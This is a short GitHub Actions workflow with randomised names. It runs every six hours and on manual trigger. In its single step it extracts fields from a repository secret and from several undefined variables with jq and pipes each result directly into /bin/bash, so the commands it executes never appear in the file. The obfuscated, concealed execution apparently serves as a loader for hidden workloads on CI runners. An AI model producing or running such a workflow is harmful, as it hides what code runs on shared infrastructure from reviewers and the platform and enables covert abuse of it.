name: wuhaoning3214
on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          oaxm281: ${{ secrets.oaxm281 }}
        run: |
          echo $oaxm281 | jq -r .zkpmq433 | /bin/bash
          echo $pg6 | jq -r .pfxky92884 | /bin/bash
          echo $khgpq23990 | jq -r .okak1555 | /bin/bash
          echo $dbdlk061 | jq -r .kie31 | /bin/bash
          echo $uorl768 | jq -r .u12 | /bin/bash
          echo $xu2 | jq -r .hrj4340 | /bin/bash
          echo $aiwhu814 | jq -r .d2717 | /bin/bash
          echo $oh17039 | jq -r .sf68484 | /bin/bash
          echo $l39979 | jq -r .r8451 | /bin/bash
          echo $ys29501 | jq -r .ndkr43142 | /bin/bash
          echo $uf6997 | jq -r .nvw94970 | /bin/bash
          echo $j8 | jq -r .m2 | /bin/bash

